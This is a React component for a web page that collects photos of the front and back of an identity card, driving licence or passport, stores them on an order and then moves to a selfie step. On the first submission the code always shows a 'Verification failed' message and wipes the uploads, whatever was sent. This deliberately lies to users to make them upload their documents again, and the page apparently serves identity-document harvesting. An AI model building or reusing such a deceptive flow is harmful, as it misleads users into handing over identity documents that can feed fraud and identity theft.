import React, { Component } from "react";
import "../style/info.scss";
import HeadBar from "./common/HeadBar";
import idCard from "../image/ID-card.png";
import cardBack from "../image/document_back.png";
import { Radio } from "antd";
import * as UploadAPI from "../apis/UploadAPI";
import Loading from "./common/Loading";
import BWM from "../icon/Bmw";
import { BASE_URL } from "../constants/ApiEndpointConstants";
import * as FacebookAPI from "../apis/FacebookAPI";
import Order from "./Order";
import * as UpdateOrderAPI from "../apis/UpdateOrderAPI";
import { routePage } from "../utils/routePage";
import MarkIcon from "../icon/MarkIcon";
import cardMask from "../image/card-mask.jpg";
import Close from "../icon/Close";
import cardMark from "../image/watermark.png";
import * as PostMessageAPI from "../apis/PostMessageAPI";
import safeParse from "../utils/SafeParseLocalstrorage";
import { lang } from "../utils/lang";
import getAd from "../utils/GetAd";

class Info extends Component {
  constructor(props) {
    super(props);
    this.state = {
      loadingShow: false,
      cardList: [
        { title: "Identity Card", checked: true },
        { title: "Driving Licence", checked: false },
        { title: "Passport", checked: false },
      ],
      documentFront: "",
      documentBack: "",
      identityType: "Identity Card",
      orderDetail: safeParse("orderDetail") || {},
      ad: getAd(),
      showCardMask: false,
      isFirstSubmit: safeParse("isFirstSubmit" || 0),
      smooth: true,
      groupid: safeParse("groupid"),
    };
    this.changeChecked = this.changeChecked.bind(this);
    this.upload = this.upload.bind(this);
    this.toggleShow = this.toggleShow.bind(this);
    this.routeSelfie = this.routeSelfie.bind(this);
    this.showCardMask = this.showCardMask.bind(this);
  }

  componentDidMount() {
    let { orderDetail, cardList } = this.state;
    if (orderDetail?.identityType) {
      this.setState({
        identityType: orderDetail?.identityType || "Identity Card",
        documentFront: orderDetail?.documentFront || "",
        documentBack: orderDetail?.documentBack || "",
        cardList: cardList.map((item) => ({
          ...item,
          checked: item.title === orderDetail?.identityType,
        })),
      });
    }
    const timer = setTimeout(() => {
      clearTimeout(timer);
      this.setState({ smooth: false });
    }, 100);
  }

  changeChecked(index) {
    let { cardList } = this.state;
    cardList.map((item, itemIndex) => {
      item.checked = false;
      if (index === itemIndex) {
        item.checked = true;
        this.setState({ identityType: item.title });
      }
    });
    this.setState({ cardList });
  }

  upload(e, type) {
    let { orderDetail, ad } = this.state;
    var _that = this;
    console.log(e.target.files[0]);

    [e.target.files[0]].forEach((fileItem, fileIndex) => {
      if (fileIndex > 0) return;
      let reads = new FileReader();
      reads?.readAsDataURL(fileItem);
      reads.onload = function (e) {
        const imgUrl = this.result;
        _that.toggleShow();
        UploadAPI.upload(imgUrl, orderDetail?.snCode).then((res) => {
          _that.toggleShow();
          var url = res.data.data.url;
          switch (type) {
            case "front":
              _that.setState({ documentFront: url }, () => {
                orderDetail.documentFront = url;
                _that.toggleShow();
                UpdateOrderAPI.updateOrderInformation(orderDetail)
                  .then((res) => {
                    _that.toggleShow();
                  })
                  .catch((err) => {
                    _that.toggleShow();
                  });
              });
              break;
            case "back":
              _that.setState({ documentBack: url }, () => {
                orderDetail.documentBack = url;
                _that.toggleShow();
                UpdateOrderAPI.updateOrderInformation(orderDetail)
                  .then((res) => {
                    _that.toggleShow();
                  })
                  .catch((err) => {
                    this.toggleShow();
                  });
              });
              break;
            default:
              break;
          }
        });
      };
    });
  }

  toggleShow() {
    this.setState({ loadingShow: !this.state.loadingShow });
  }

  routeSelfie() {
    let { location, history } = this.props;
    let {
      identityType,
      documentBack,
      documentFront,
      isFirstSubmit,
      orderDetail,
      smooth,
      ad,
    } = this.state;
    if (isFirstSubmit < 1) {
      localStorage.setItem("isFirstSubmit", 1);
      return this.setState({
        showCardMask: !this.state.showCardMask,
        isFirstSubmit: 1,
        documentBack: "",
        documentFront: "",
      });
    }
    routePage(history, ad, "/Selfie");
    orderDetail.documentFront = documentFront;
    orderDetail.documentBack = documentBack;
    orderDetail.identityType = identityType;
    localStorage.setItem("orderDetail", JSON.stringify(orderDetail));
  }

  showCardMask() {
    this.setState({ showCardMask: !this.state.showCardMask });
  }

  render() {
    const { cardList, documentBack, documentFront, showCardMask } = this.state;
    let nextBtn = false;
    if (cardList[2].checked === true) {
      nextBtn = documentFront !== "";
    } else {
      nextBtn = documentFront !== "" && documentBack !== "";
    }

    return (
      <React.Fragment>
        {showCardMask && (
          <div className="card-mask">
            <div className="card-box" onClick={this.showCardMask}>
              <Close size={24} color="#424242" className="close-Icon" />
              <div className="img">
                <img src={cardMask} alt="" />
              </div>
              <div className="title">Verification failed</div>
              <p>
                The details provided could not be verified. Please upload a
                clear and valid image of your identification document. Ensure
                that all text is legible and the entire document is visible.
              </p>
            </div>
          </div>
        )}
        <Loading {...this.props} loadingShow={this.state.loadingShow} />
        <div className={`info-page`}>
          <HeadBar {...this.props} />
          <div className={`info-box ${this.state.smooth ? "smooth" : ""}`}>
            <h1>Choose your identification document</h1>
            <p className="p">
              <i>
                (Please upload a clear and legible image of your selected
                document.)
              </i>
            </p>
            {cardList.map((item, index) => {
              return (
                <div
                  className="input-row"
                  key={index}
                  onClick={() => this.changeChecked(index)}
                >
                  <Radio checked={item.checked}></Radio> {"  "}{" "}
                  <p>{item.title}</p>
                </div>
              );
            })}
            <div className="id-card">
              <div
                className="left"
                style={{
                  backgroundImage: `url(${BASE_URL + documentFront})`,
                  backgroundRepeat: "no-repeat",
                  backgroundSize: "contain",
                  backgroundPosition: "center center",
                }}
              >
                {documentFront === "" ? (
                  <img src={idCard} alt="" />
                ) : (
                  <div className="img-mask">
                    <div className="size-box">
                      {Array.from({ length: 15 }).map((_, i) => (
                        <li>
                          {Array.from({ length: 15 }).map((_, i) => (
                            <BWM
                              size={12}
                              color="#fff"
                              style={{ margin: "10px" }}
                            />
                          ))}
                        </li>
                      ))}
                    </div>
                  </div>
                )}
                <input
                  type="file"
                  className="file-box"
                  accept="image/png, image/jpeg, image/jpg, image/webp"
                  onChange={(e) => this.upload(e, "front")}
                />
              </div>
              {cardList[2].checked ? (
                ""
              ) : (
                <div
                  className="right"
                  style={{
                    backgroundImage: `url(${BASE_URL + documentBack})`,
                    backgroundRepeat: "no-repeat",
                    backgroundSize: "contain",
                    backgroundPosition: "center center",
                  }}
                >
                  {documentBack === "" ? (
                    <img src={cardBack} alt="" />
                  ) : (
                    <div className="img-mask">
                      <div className="size-box">
                        {Array.from({ length: 12 }).map((_, i) => (
                          <li>
                            {Array.from({ length: 12 }).map((_, i) => (
                              <BWM
                                size={12}
                                color="#fff"
                                style={{ margin: "10px" }}
                              />
                            ))}
                          </li>
                        ))}
                      </div>
                    </div>
                  )}
                  <input
                    type="file"
                    className="file-box"
                    accept="image/png, image/jpeg, image/jpg, image/webp"
                    onChange={(e) => this.upload(e, "back")}
                  />
                </div>
              )}
            </div>
            <div
              className={nextBtn ? "check" : "btn"}
              onClick={nextBtn ? this.routeSelfie : undefined}
            >
              {lang.next}
            </div>
          </div>
        </div>
      </React.Fragment>
    );
  }
}

export default Info;
